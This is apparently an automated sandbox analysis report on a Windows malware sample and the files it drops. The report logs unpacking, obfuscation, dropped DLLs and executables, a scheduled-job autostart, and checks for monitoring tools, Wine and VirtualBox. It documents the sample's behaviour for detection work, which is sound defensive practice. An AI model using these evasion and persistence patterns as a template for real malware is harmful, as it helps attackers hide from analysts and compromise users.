Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 2523648 > 1048576
Source: file.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x224e00
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.ff0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Unpacked PE file: 8.2.HCGCBFHCFC.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 10.2.explorti.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 11.2.explorti.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Unpacked PE file: 12.2.a62ee169b8.exe.900000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 15.2.explorti.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 16.2.explorti.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 17.2.explorti.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 18.2.explorti.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6C9B3480
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .data
PE file contains an invalid checksum
Source: random[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x26c425
Source: a62ee169b8.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x26c425
Source: explorti.exe.8.dr Static PE information: real checksum: 0x1dcb6e should be: 0x1e158e
Source: file.exe Static PE information: real checksum: 0x0 should be: 0x26c425
Source: HCGCBFHCFC.exe.0.dr Static PE information: real checksum: 0x1dcb6e should be: 0x1e158e
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1dcb6e should be: 0x1e158e
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: HCGCBFHCFC.exe.0.dr Static PE information: section name:
Source: HCGCBFHCFC.exe.0.dr Static PE information: section name: .idata
Source: HCGCBFHCFC.exe.0.dr Static PE information: section name:
Source: HCGCBFHCFC.exe.0.dr Static PE information: section name: wiqvgckm
Source: HCGCBFHCFC.exe.0.dr Static PE information: section name: emtqvjqa
Source: HCGCBFHCFC.exe.0.dr Static PE information: section name: .taggant
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: wiqvgckm
Source: amadka[1].exe.0.dr Static PE information: section name: emtqvjqa
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: .idata
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: wiqvgckm
Source: explorti.exe.8.dr Static PE information: section name: emtqvjqa
Source: explorti.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: a62ee169b8.exe.10.dr Static PE information: section name:
Source: a62ee169b8.exe.10.dr Static PE information: section name:
Source: a62ee169b8.exe.10.dr Static PE information: section name:
Source: a62ee169b8.exe.10.dr Static PE information: section name:
Source: a62ee169b8.exe.10.dr Static PE information: section name:
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9EB536 push ecx; ret 0_2_6C9EB549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00DBD82C push ecx; ret 10_2_00DBD83F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F602760 push 7F600002h; ret 12_2_7F60276F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F602460 push 7F600002h; ret 12_2_7F60246F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F600960 push 7F600002h; ret 12_2_7F60096F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F600C60 push 7F600002h; ret 12_2_7F600C6F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F600F60 push 7F600002h; ret 12_2_7F600F6F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F601260 push 7F600002h; ret 12_2_7F60126F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F601560 push 7F600002h; ret 12_2_7F60156F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F601860 push 7F600002h; ret 12_2_7F60186F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F601B60 push 7F600002h; ret 12_2_7F601B6F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F601E60 push 7F600002h; ret 12_2_7F601E6F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F602160 push 7F600002h; ret 12_2_7F60216F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F602670 push 7F600002h; ret 12_2_7F60267F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F602370 push 7F600002h; ret 12_2_7F60237F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F600870 push 7F600002h; ret 12_2_7F60087F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F600B70 push 7F600002h; ret 12_2_7F600B7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F600E70 push 7F600002h; ret 12_2_7F600E7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F601170 push 7F600002h; ret 12_2_7F60117F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F601470 push 7F600002h; ret 12_2_7F60147F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F601770 push 7F600002h; ret 12_2_7F60177F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F601A70 push 7F600002h; ret 12_2_7F601A7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F601D70 push 7F600002h; ret 12_2_7F601D7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F602070 push 7F600002h; ret 12_2_7F60207F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F602640 push 7F600002h; ret 12_2_7F60264F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F602340 push 7F600002h; ret 12_2_7F60234F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F600840 push 7F600002h; ret 12_2_7F60084F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F600B40 push 7F600002h; ret 12_2_7F600B4F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F600E40 push 7F600002h; ret 12_2_7F600E4F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F601140 push 7F600002h; ret 12_2_7F60114F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F601440 push 7F600002h; ret 12_2_7F60144F
Source: file.exe Static PE information: section name: entropy: 7.995115143685791
Source: file.exe Static PE information: section name: entropy: 7.981632425643477
Source: file.exe Static PE information: section name: entropy: 7.95439535087447
Source: HCGCBFHCFC.exe.0.dr Static PE information: section name: entropy: 7.9816443894743605
Source: HCGCBFHCFC.exe.0.dr Static PE information: section name: wiqvgckm entropy: 7.953626217985581
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.9816443894743605
Source: amadka[1].exe.0.dr Static PE information: section name: wiqvgckm entropy: 7.953626217985581
Source: explorti.exe.8.dr Static PE information: section name: entropy: 7.9816443894743605
Source: explorti.exe.8.dr Static PE information: section name: wiqvgckm entropy: 7.953626217985581
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.995115143685791
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.981632425643477
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.95439535087447
Source: a62ee169b8.exe.10.dr Static PE information: section name: entropy: 7.995115143685791
Source: a62ee169b8.exe.10.dr Static PE information: section name: entropy: 7.981632425643477
Source: a62ee169b8.exe.10.dr Static PE information: section name: entropy: 7.95439535087447
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA155F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6CA155F0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
